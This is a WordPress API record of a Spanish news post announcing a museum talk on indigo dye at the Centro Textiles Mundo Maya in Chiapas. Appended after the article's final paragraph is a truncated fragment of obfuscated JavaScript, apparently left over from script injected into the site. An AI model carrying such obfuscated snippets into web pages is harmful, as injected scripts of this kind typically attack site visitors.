{"id":15643,"date":"2024-05-17T02:59:49","date_gmt":"2024-05-17T02:59:49","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=15643"},"modified":"2024-05-17T02:59:51","modified_gmt":"2024-05-17T02:59:51","slug":"realizaran-charla-sobre-el-anil-en-el-centro-textiles-mundo-maya","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=15643","title":{"rendered":"Realizar\u00e1n charla sobre el A\u00f1il en el Centro Textiles Mundo Maya"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/IMG-20240516-WA0016-768x1024.jpg\" alt=\"\" class=\"wp-image-15644\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/IMG-20240516-WA0016-768x1024.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/IMG-20240516-WA0016-225x300.jpg 225w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/IMG-20240516-WA0016-1152x1536.jpg 1152w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/IMG-20240516-WA0016.jpg 1200w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>16 de mayo del 2024. San Crist\u00f3bal de Las Casas.- En el marco del D\u00eda Internacional de los Museos 2024, bajo el lema &#8220;Museos por la Educaci\u00f3n e Investigaci\u00f3n&#8221;, el Centro Textiles Mundo Maya llevar\u00e1 a cabo una charla titulada &#8220;Qu\u00e9 sabemos del a\u00f1il&#8221;. Este evento, programado para el 17 de mayo a las 13 horas, contar\u00e1 con la participaci\u00f3n especial de Emiliano Gallaga, reconocido por sus investigaciones en torno al llamado &#8220;oro azul&#8221;.<\/p>\n\n\n\n<p>Los organizadores dieron a conocer que Gallaga abordar\u00e1 diversos aspectos relacionados con el a\u00f1il, desde las piezas de las colecciones te\u00f1idas con este colorante natural, que han sido identificadas por especialistas, hasta la producci\u00f3n y los procesos de te\u00f1ido llevados a cabo por artesanos.<\/p>\n\n\n\n<p>Su presentaci\u00f3n ofrecer\u00e1 una visi\u00f3n integral de la importancia del a\u00f1il, un colorante extra\u00eddo de la planta Xiquilite, utilizado por los mayas en sus rituales, como planta medicinal, para decorar cer\u00e1micas y para pintar. Este colorante, conocido tambi\u00e9n como &#8220;oro azul&#8221;, es un elemento crucial en la historia y cultura maya.<\/p>\n\n\n\n<p>\u201cLa charla se llevar\u00e1 a cabo en la Sala interactiva ubicada en la planta alta del Ex Convento de Santo Domingo y la entrada ser\u00e1 libre, abierta a todos los interesados en conocer m\u00e1s sobre este fascinante tema. La invitaci\u00f3n se extiende a investigadores, estudiantes, artesanos y al p\u00fablico en genera\u201d, coment\u00f3.<\/p>\n\n\n\n<p>Asimismo, aseguran que este evento no solo celebra el D\u00eda Internacional de los Museos, sino que tambi\u00e9n promueve la educaci\u00f3n y la investigaci\u00f3n, resaltando la relevancia hist\u00f3rica y cultural del a\u00f1il en la civilizaci\u00f3n maya. \u201cLos asistentes tendr\u00e1n la oportunidad de aprender directamente de un experto y de interactuar en un espacio dise\u00f1ado para fomentar el intercambio de conocimientos\u201d.<\/p>\n\n\n\n<p>\u201cEl Centro Textiles Mundo Maya reafirma as\u00ed su compromiso con la difusi\u00f3n y preservaci\u00f3n del patrimonio cultural, invitando a la comunidad a participar en esta enriquecedora experiencia educativa\u201d, concluyen.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 16 de mayo del 2024. San Crist\u00f3bal de Las Casas.- En el marco del D\u00eda Internacional de los Museos 2024, bajo el lema &#8220;Museos por la Educaci\u00f3n e Investigaci\u00f3n&#8221;, el Centro Textiles Mundo Maya llevar\u00e1 a cabo una charla titulada &#8220;Qu\u00e9 sabemos del a\u00f1il&#8221;. Este evento, programado para el 17 de mayo &hellip;<\/p>\n","protected":false},"author":2,"featured_media":15644,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-15643","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15643","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=15643"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15643\/revisions"}],"predecessor-version":[{"id":15645,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15643\/revisions\/15645"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/15644"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=15643"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=15643"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=15643"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}